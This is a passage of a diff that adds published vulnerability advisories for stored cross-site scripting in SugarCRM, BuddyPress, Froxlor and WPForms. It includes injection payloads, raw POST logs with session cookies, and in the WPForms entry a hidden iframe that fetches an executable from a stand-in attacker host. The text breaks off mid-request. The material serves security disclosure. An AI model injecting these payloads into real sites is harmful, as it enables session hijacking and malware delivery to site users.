+2020-05-03: Researcher Notification & Coordination (Security Researcher)
+2020-05-04: Vendor Notification (Security Department)
+2020-05-24: Vendor Notification (Security Department)
+****-**-**: Vendor Response/Feedback (Security Department)
+****-**-**: Vendor Fix/Patch (Service Developer Team)
+****-**-**: Security Acknowledgements (Security Department)
+2020-11-16: Public Disclosure (Vulnerability Laboratory)
+
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the official SugarCRM v6.5.18 web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to
+compromise browser to web-application requests from the application-side.
+
+The persistent cross site web vulnerability is located in the primary
+address state and alternate address state
+input fields of the sales or support module open to create a contacts.
+Remote attackers with low privileged
+sugarcrm accounts are able to inject own malicious script code as
+contact. Higher privileged application user
+accounts will execute the script code on preview of the created contact
+to e.g gain moderator or administrator
+rights via session hijacking, phishing or further persistent
+manipulative web attacks. The code does not only
+execute in the same section were the contact is listed or previewed but
+also after save in the view log function
+context. The attack can thus way be performed via create of a contact or
+via import of a vcf file contact.
+The request method to inject is POST and the attack is limited to
+registered user accounts with default
+contact to the contacts module.
+
+The script code is able to bypass the basic validation process because
+of the primary address state and alternate
+address state are exchanged in the transmit request. Normally in a
+regular transmit the context is parsed securely.
+In the actual case an attacker injects script code in the alternate
+adress when changing the main adress the wrong
+sanitized code occurs in the front-end.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation of
+affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Sales
+[+] Support
+
+Vulnerable Input(s):
+[+] Primary Address State
+[+] Alternate Address State
+
+Vulnerable Parameter(s):
+[+] primary address state
+[+] alternate address state
+
+Affected Module(s):
+[+] Sales - Contact List
+[+] Support - Contact List
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerability can be exploited by
+remote attackers with low privileged user account and with low user
+interaction.
+For security demonstration or to reproduce the persistent cross site web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the sugarcrm application
+2. Login as low privileged user account
+3. Move to sales or support and click to contact, then open create a new
+contact
+4. Inject payload in the other address and primary adress to the
+alternate address state and primary state input fields
+5. Save the entry and a refresh occurs with the inserted contact details
+Note: The script code execute immediatly after saving in the primary
+adress state and alternate adress state section of both modules
+6. Successful reproduce of the persistent cross site scripting web
+vulnerability!
+
+
+PoC: Payload
+><iframe src=evil.source onload=alert(document.domain)>
+
+
+PoC: Vulnerable Source
+<tr><td scope="col" width="12.5%">
+Primary Address:
+</td>
+<td width="37.5%">
+<table width="100%" cellspacing="0" cellpadding="0" border="0">
+<tbody><tr>
+<td width="99%">
+<input type="hidden" class="sugar_field" id="primary_address_street"
+value="q">
+<input type="hidden" class="sugar_field" id="primary_address_city"
+value="a">
+<input type="hidden" class="sugar_field" id="primary_address_state"
+value="[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
+<input type="hidden" class="sugar_field" id="primary_address_country"
+value="y">
+<input type="hidden" class="sugar_field" id="primary_address_postalcode"
+value="p">
+</td><td class="dataField" width="1%">
+</td></tr>
+</tbody></table></td>
+<td scope="col" width="12.5%">
+Other Address:</td>
+<td width="37.5%">
+<table width="100%" cellspacing="0" cellpadding="0" border="0">
+<tbody><tr><td width="99%">
+<input type="hidden" class="sugar_field" id="alt_address_street" value="n">
+<input type="hidden" class="sugar_field" id="alt_address_city" value="a">
+<input type="hidden" class="sugar_field" id="alt_address_state"
+value=">"[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
+<input type="hidden" class="sugar_field" id="alt_address_country" value="k">
+<input type="hidden" class="sugar_field" id="alt_address_postalcode"
+value="r">
+</td>
+<td class="dataField" width="1%">
+</td>
+</tr>
+</tbody></table>
+</td>
+</tr>
+
+
+--- PoC Session Logs [POST] ---
+https://sugar-crm.localhost:8000/index.php
+Host: sugar-crm.localhost:8000
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1336
+Origin: https://sugar-crm.localhost:8000
+Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
+Connection: keep-alive
+Referer: https://sugar-crm.localhost:8000/index.php
+
+Cookie: p7token=677939c76f1b303862ac57ac3592a50e; checkCookie=1;
+PHPWMADMINSESSID=di26ub5h6fegtndktcu4qbkhc1;
+PHPSESSID=t1glh0rluv1cl7h0oh4i1nius4; sugar_user_theme=Sugar5;
+ck_login_id_20=1; ck_login_language_20=en_us;
+EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125;
+EmailTreeLayout=42f3ef1b-3d1b-eac3-16a7-5eaeeeaae11c=false&
+713e7381-3309-2845-3c71-5eaeee59f0ca=false&be8b5121-f32c-13fd-cd9c-5eaeeec3b167=false&
+e3e40862-d8f3-77f0-f92e-5eaeee07eb24=false; Meetings_divs=history_v%3D%23
+-
+module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&isDuplicate=false&action=Save&return_module=Contacts&
+return_action=DetailView&return_id=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_tab=&contact_role=&relate_to=Contacts&
+relate_id=45ab08a6-6ca8-fd0f-c4cb5eaef0e0ef02&offset=1&opportunity_id=&case_id=&bug_id=&email_id=&inbound_email_id=&
+salutation=Mr.&first_name=nam23&last_name=e&phone_work=n&title=r&phone_mobile=h&department=t&phone_fax=k&account_name=&
+account_id=&primary_address_street=h&primary_address_city=z&
+primary_address_state=t<iframe src=evil.source
+onload=aler(document.cookie)>&primary_address_postalcode=b&
+primary_address_country=v&alt_address_street=h&alt_address_city=z&alt_address_state=t<iframe
+src=evil.source
+onload=alert(document.cookie)>&alt_address_postalcode=b&alt_address_country=v&alt_checkbox=on&Contacts_email_widget_id=0&
+emailAddressWidget=1&Contacts0emailAddress0=&Contacts0emailAddressId0=&
+Contacts0emailAddressPrimaryFlag=Contacts0emailAddress0&Contacts0emailAddressVerifiedFlag0=true&
+Contacts0emailAddressVerifiedValue0=&useEmailWidget=true&description=v<iframe
+src=a>&report_to_name=&
+reports_to_id=&sync_contact=0,1&lead_source=Web
+Site&do_not_call=0&campaign_name=&campaign_id=&
+assigned_user_name=h%20m&assigned_user_id=1
+-
+POST: HTTP/1.1 200 OK
+Content-Type: text/html; charset=UTF-8
+Location:
+index.php?action=DetailView&module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&offset=1
+Server: Microsoft-IIS/8.5
+Set-Cookie: ck_login_id_20=1; Max-Age=7776000; path=/;
+domain=sugar-crm.localhost:8000
+ck_login_language_20=en_us;  Max-Age=7776000; path=/;
+domain=sugar-crm.localhost:8000
+sugar_user_theme=Sugar5;  Max-Age=31536000
+X-Powered-By: ASP.NET
+Content-Length: 231
+
+
+https://sugar-crm.localhost:8000/index.php?module=Contacts&action=index
+https://sugar-crm.localhost:8000/index.php?module=Audit&action=Popup&query=true&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_name=Contacts
+https://sugar-crm.localhost:8000/index.php?module=Import&action=Step1&import_module=Contacts&return_module=Contacts&return_action=index
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched following the next steps ...
+1. Restrict the input fields and disallow special chars for the main
+name values displayed in the list
+2. Escape the input transmitted from the alternate and primary inputs
+3. Parse and sanitize the ouput location to ensure its filtered securely
+
+
+Security Risk:
+==============
+The security risk of the persistent cross site web vulnerability in the
+sugarcrm web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49061.txt b/exploits/php/webapps/49061.txt
new file mode 100644
index 000000000..bc1d5363f
--- /dev/null
+++ b/exploits/php/webapps/49061.txt
@@ -0,0 +1,292 @@
+# Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-13
+# Vendor Homepage: https://wordpress.org/plugins/buddypress/
+# Version: 6.2.0
+
+Document Title:
+===============
+Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2263
+
+
+Release Date:
+=============
+2020-11-13
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2263
+
+
+Common Vulnerability Scoring System:
+====================================
+4.2
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Are you looking for modern, robust, and sophisticated social network
+software? BuddyPress is a suite of components that are common
+to a typical social network, and allows for great add-on features
+through WordPress’s extensive plugin system. Aimed at site builders
+& developers, BuddyPress is focused on ease of integration, ease of use,
+and extensibility. It is deliberately powerful yet unbelievably
+simple social network software, built by contributors to WordPress.
+
+(Copy of the Homepage: https://wordpress.org/plugins/buddypress/ &
+https://buddypress.org/download/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent
+xss web vulnerability in the Buddypress v6.2.0 plugin for wordpress.
+
+
+Affected Product(s):
+====================
+Buddypress
+Product: Buddypress v6.0.0 - v6.2.0 (Wordpress Plugin)
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-11-13: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Moderator Privileges)
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered  in
+the Buddypress v6.0.0 - v6.2.0 plugin for wordpress.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent vulnerability is located in the `wp:html` name parameter
+of the `figure` content. Remote attackers with privileges
+are able to inject own malicious persistent script code as input to
+compromise the internal ui of the wordpress backend. The attacker
+injects his code and in case the admin or other privileged user account
+previews the content the code simple executes. The request method
+to inject is POST and the attack vector is located on the application-side.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] wp:html
+
+Vulnerable Parameter(s):
+[+] figure
+
+Affected Module(s):
+[+] page_id=x&preview=true
+
+
+Proof of Concept (PoC):
+=======================
+The persistent web vulnerability can be exploited by remote attackers
+with privilged user accounts without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+PoC: Inject
+https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
+
+
+PoC: Execute
+https://test23.localhost:8000/?page_id=6
+https://test23.localhost:8000/?page_id=6&preview=true
+
+
+PoC: Vulnerable Source
+<div id="content" class="site-content">
+<div class="wrap">
+<div id="primary" class="content-area">
+<main id="main" class="site-main" role="main">		
+<article id="post-6" class="post-6 page type-page status-draft hentry">
+<header class="entry-header">
+<h1 class="entry-title">Mitglieder</h1><span class="edit-link">
+<a class="post-edit-link"
+href="https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit">
+<span class="screen-reader-text">„Mitglieder“</span>
+bearbeiten</a></span>	</header><!-- .entry-header -->
+<div class="entry-content">
+<p></p>
+<div class="wp-block-group"><div class="wp-block-group__inner-container">
+<div class="wp-block-group"><div
+class="wp-block-group__inner-container"></div></div>
+</div></div>
+<figure><iframe src="evil.source"
+onload="alert(document.cookie)"></iframe></figure>
+</div><!-- .entry-content -->
+</article><!-- #post-6 -->
+</main><!-- #main -->
+</div><!-- #primary -->
+</div><!-- .wrap -->
+</div>
+
+
+--- PoC Session Logs (POST) ---
+https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user
+Host: test23.localhost:8000
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
+Gecko/20100101 Firefox/76.0
+Accept: application/json, */*;q=0.1
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
+X-WP-Nonce: 04a953e188
+X-HTTP-Method-Override: PUT
+Content-Type: application/json
+Origin: https://test23.localhost:8000
+Content-Length: 614
+Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
+Connection: keep-alive
+Cookie:
+g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix
+xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17;
+wp-settings-time-1=1589740723
+{"id":6,"content":"<!-- wp:paragraph -->n<p></p>n<!-- /wp:paragraph
+-->nn<!-- wp:group -->n<div class="wp-block-group">
+<div class="wp-block-group__inner-container"><!-- wp:group -->n<div
+class="wp-block-group"><div class="wp-block-group__inner-container">
+<!-- wp:block {"ref":"reusable1"} /--></div></div>n<!-- /wp:group
+--></div></div>n<!-- /wp:group -->nn
+<!-- wp:block {"ref":"reusable1"} /-->nn<!-- wp:block
+{"ref":"reusable1"} /-->nn
+<!-- wp:html -->n<figure><iframe src="evil.source"
+onload="alert(document.cookie)"></iframe></figure>n<!-- /wp:html
+-->nn<!-- wp:bp/member /-->"}
+-
+POST: HTTP/1.1 200 OK
+Cache-Control: no-cache, must-revalidate, max-age=0
+Allow: GET, POST, PUT, PATCH, DELETE
+Content-Type: application/json; charset=UTF-8
+Vary: Origin
+Server: Microsoft-IIS/8.5
+X-Robots-Tag: noindex
+Link: <https://test23.localhost:8000/index.php?rest_route=/>;
+rel="https://api.w.org/"
+Content-Length: 3108
+
+
+References:
+https://test23.localhost:8000/index.php
+https://test23.localhost:8000/wp-admin/post.php
+
+
+Security Risk:
+==============
+The security risk of the persistent input validation web vulnerability
+in the web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab [Research Team] -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49063.txt b/exploits/php/webapps/49063.txt
new file mode 100644
index 000000000..3a98bb4ce
--- /dev/null
+++ b/exploits/php/webapps/49063.txt
@@ -0,0 +1,301 @@
+# Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
+# Exploit Author: Vulnerability-Lab
+# Date: 2020-11-12
+# Vendor Homepage: https://froxlor.org/
+# Software Link: https://froxlor.org/download/
+# Version: 0.10.16
+
+Document Title:
+===============
+Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2241
+
+
+Release Date:
+=============
+2020-11-12
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2241
+
+
+Common Vulnerability Scoring System:
+====================================
+5.2
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Froxlor Server Management Panel, the lightweight server management
+software for your needs. Developed by experienced server
+administrators, this open source (GPL) panel simplifies the effort of
+managing your hosting. Manage reseller ressources and
+limit what the customers may use in the dedicated customerpanel. MySQL
+management, Directory protection & settings management.
+
+(Copy of the Homepage: https://froxlor.org/index.php  &
+https://froxlor.org/download/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent
+cross site vulnerability in the Froxlor Server Management Panel v0.10.16.
+
+
+Affected Product(s):
+====================
+Froxlor Team
+Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel)
+Affected Packages: Gentoo, Debian & Ubuntu
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-01: Researcher Notification & Coordination (Security Researcher)
+2020-05-02: Vendor Notification (Security Department)
+2020-05-13: Vendor Response/Feedback (Security Department)
+2020-10-12: Vendor Fix/Patch (Service Developer Team)
+****-**-**: Security Acknowledgements (Security Department)
+2020-11-12: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted Authentication (Guest Privileges)
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Full Disclosure
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in
+the Froxlor Server Management Panel v0.10.16 web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The persistent cross site web vulnerability is located in the
+`username`, `name` and `firstname` input fields of the customer
+add or registration module. Remote attackers are able to add customers
+with malicious script code as firstname or name to
+manipulate in the backend the `admin_customers.php` and `customers.php`
+files. The injection point is the registration
+or customer add/edit module and the execution occurs on preview of the
+traffic module in the admin backend. The request
+method to inject is POST and the attack vector is persistent located on
+the application-side. In a valid attack case the
+remote attacker uses a customer or reseller account to inject the
+payload as name to provoke an execute in the insecure
+backend module.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Input(s):
+[+] Username
+[+] Name
+[+] Firstname
+
+Vulnerable Module(s):
+[+] Customers
+
+Vulnerable Parameter(s):
+[+] name
+[+] firstname
+
+Affected File(s):
+[+] admin_customers.php
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation vulnerability can be exploited by remote
+attackers with low privilege user account and with low user interaction.
+For security demonstration or to reproduce the security web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Register or login with a low privilege user account
+2. Open the profile account section
+3. Change the name and firstname or include in the registration process
+Note: Inject test payload to vulnerable marked input fields
+4. Save or submit the input via form
+5. Wait until an admin or higher privileged user role opens the traffic
+stats to execute
+6. Successful reproduce of the persistent input validation web
+vulnerability!
+
+
+PoC: Payload (Exploitation)
+test%20>"<script alert(document.cookie)></script>div style=1
+
+
+PoC: Vulnerable Sources (Execution Points) [admin_customers.php or
+customers.php to admin_traffic.php via Name & Firstname]
+<tr role="row">
+<td>>">test%20>"<script alert(document.cookie)></script>div
+style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]&nbsp;
+<a
+href="admin_customers.php?s=9e20410f4871894db51f11258d5c4b3b&target=traffic&page=customers&action=su&id=2"
+
+rel="external" target="_blank">[Details]</a></td>
+<td><small>-</small></td>
+</tr><tr role="row">
+
+
+--- PoC Session Logs [POST] --- (Reseller Account to Admin)
+https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20
+Host: froxlor.localhost:8080
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 879
+Origin: https://froxlor.localhost:8080
+Connection: keep-alive
+Referer:
+https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add
+Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo
+s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send&
+new_loginname=test1%20>"<script alert(document.cookie)></script>div
+style=1&createstdsubdomain=0,1&
+store_defaultindex=0,1&new_customer_password=KwhyqgzvPo&
+new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1&
+name=btest%20>"<script alert(document.cookie)></script>div style=1&
+firstname=ctest%20>"<script alert(document.cookie)></script>div
+style=1&gender=0&
+company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=&
+custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0&
+email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1&
+perlenabled=0&dnsenabled=0&logviewenabled=0
+-
+POST: HTTP/2.0 200 OK
+server: Apache
+vary: Accept-Encoding
+content-encoding: gzip
+content-length: 1393
+content-type: text/html; charset=UTF-8
+
+
+Reference(s):
+https://froxlor.localhost:8080/
+https://froxlor.localhost:8080/admin_traffic.php
+https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by follwing the next steps ...
+1. Validate and escape the content of the vulnerable username, name and
+firstname input fields
+2. Restrict the input fields and disallow specialchars on inputs to filter
+3. Parse the two output location and escape or secure encode the content
+4. Encode in the edit formular the results on check
+
+
+Security Risk:
+==============
+The security risk of the persistent validation web vulnerability in the
+web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
\ No newline at end of file
diff --git a/exploits/php/webapps/49069.txt b/exploits/php/webapps/49069.txt
new file mode 100644
index 000000000..55e68f2ef
--- /dev/null
+++ b/exploits/php/webapps/49069.txt
@@ -0,0 +1,44 @@
+#Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
+#Exploit Author : ZwX
+#Exploit Date : 2020-10-23
+#Vendor Homepage : https://wpforms.com/
+#Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip
+
+
+[+] Description Vulnerability:
+==============================
+
+A Cross Site Scripting vulnerability is located in the Wordpress plugin [WPForms] which affects version 1.6.3.1 and other versions lower.
+To exploit the vulnerability it is necessary to be identified, the attacker could hide JavaScript code without the knowledge of the owner of the site.
+ 
+
+[+] Proof Of Concept:
+=====================
+
+# HTML Code #
+
+<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><script>alert(1)</script></textarea>
+<textarea class="" id="wpforms-field-option-0-description" name="fields[0][description]" rows="3"><iframe src="https://Attacker.com/putty.exe" style="width:0;height:0;border:0; border:none;/></textarea>
+
+
+# Methode POST #
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wp-admin/admin.php?page=wpforms-builder&view=fields&form_id=990
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 7081
+Origin: http://localhost
+Connection: close
+
